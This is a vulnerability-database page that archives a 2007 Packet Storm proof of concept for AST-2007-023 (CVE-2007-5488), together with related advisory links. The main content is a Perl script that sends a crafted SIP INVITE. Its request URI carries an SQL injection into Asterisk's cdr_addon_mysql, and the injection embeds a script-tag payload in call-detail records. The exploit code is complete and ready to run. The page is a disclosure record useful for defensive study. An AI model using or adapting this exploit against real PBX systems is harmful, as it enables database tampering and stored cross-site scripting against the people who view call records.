Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormRadu StatePACKETSTORM:60187
HistoryOct 18, 2007 - 12:00 a.m.

AST-2007-023-poc.txt

2007-10-1800:00:00
Radu State
packetstormsecurity.com
17

0.002 Low

EPSS

Percentile

55.4%

JSON
`  
  
for testing purposes  
  
the POC of the vulnerabiliy discovered by the KIPH fuzzer  
  
RS  
  
  
  
  
  
  
  
#!/usr/bin/perl  
  
#############################################  
# Vulnerabily discovered using KiF ~ Kiph #  
# #  
# Authors: #  
# Humberto J. Abdelnur (Ph.D Student) #  
# Radu State (Ph.D) #  
# Olivier Festor (Ph.D) #  
# #  
# Madynes Team, LORIA - INRIA Lorraine #  
# http://madynes.loria.fr #  
#############################################  
  
use IO::Socket::INET;  
use String::Random;  
$foo = new String::Random;  
  
die "Usage $0 <callUser> <targetIP> <targetPort> <attackerUser> <localIP>  
<localPort>" unless ($ARGV[5]);  
  
sub iso2hex($) {  
my $hex = '';  
for (my $i = 0; $i < length($_[0]); $i++) {  
my $ordno = ord substr($_[0], $i, 1);  
$hex .= sprintf("%lx", $ordno);  
}  
  
$hex =~ s/ $//;;  
$hex;  
}  
  
  
$callUser = $ARGV[0];  
$targetIP = $ARGV[1];  
$targetPort = $ARGV[2];  
  
$attackerUser = $ARGV[3];  
$attackerIP= $ARGV[4];  
$attackerPort= $ARGV[5];  
  
$socket=new IO::Socket::INET->new(  
Proto=>'udp',  
PeerPort=>$targetPort,  
PeerAddr=>$targetIP,  
LocalPort=>$attackerPort);  
  
$scriptinjection= iso2hex("<script>alert(1)</script>");  
$sqlinjection= "',1,2,3,4,5,-9,-9,0x$scriptinjection,6,7,8)/*";  
  
$callid= $foo->randpattern("CCccnCn");  
$cseq = $foo->randregex('\d\d\d\d');  
  
$sdp = "v=0\r  
o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r  
s=-\r  
c=IN IP4 $attackerIP\r  
t=0 0\r  
m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r  
a=sendrecv\r  
a=ptime:20\r  
a=maxptime:200\r  
a=fmtp:96 mode-change-neighbor=1\r  
a=fmtp:18 annexb=no\r  
a=fmtp:98 0-15\r  
a=rtpmap:96 AMR/8000/1\r  
a=rtpmap:0 PCMU/8000/1\r  
a=rtpmap:8 PCMA/8000/1\r  
a=rtpmap:97 iLBC/8000/1\r  
a=rtpmap:18 G729/8000/1\r  
a=rtpmap:98 telephone-event/8000/1\r  
a=rtpmap:13 CN/8000/1\r  
";  
$sdplen= length $sdp;  
  
$msg = "INVITE sip:$sqlinjection\@$targetIP SIP/2.0\r  
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1;rport\r  
From: <sip:$attackerUser\@$attackerIP>;tag=1\r  
To: <sip:$callUser\@$targetIP>\r  
Call-ID: $callid\@$attackerIP\r  
CSeq: $cseq INVITE\r  
Max-Forwards: 70\r  
Contact: <sip:$attackerUser\@$attackerIP>\r  
Content-Type: application/sdp\r  
Content-Length: $sdplen\r  
\r  
$sdp";  
  
$socket->send($msg);  
  
  
`

Related

securityvulns 2
seebug 1
ubuntucve 1
prion 1
cve 1
securityvulns
securityvulns
AST-2007-023 - SQL Injection Vulnerabilty in cdr_addon_mysql
2007-10-18 00:00:00
Asterisk cdr_addon_mysql SQL injection
2007-10-18 00:00:00
seebug
seebug
Asterisk cdr_addon_mysql插件SQL注入漏洞
2007-10-18 00:00:00
ubuntucve
ubuntucve
CVE-2007-5488
2007-10-17 00:00:00
prion
prion
Sql injection
2007-10-17 23:17:00
cve
cve
CVE-2007-5488
2007-10-17 23:17:00

0.002 Low

EPSS

Percentile

55.4%

JSON
Related for PACKETSTORM:60187
securityvulns2seebug1ubuntucve1prion1cve1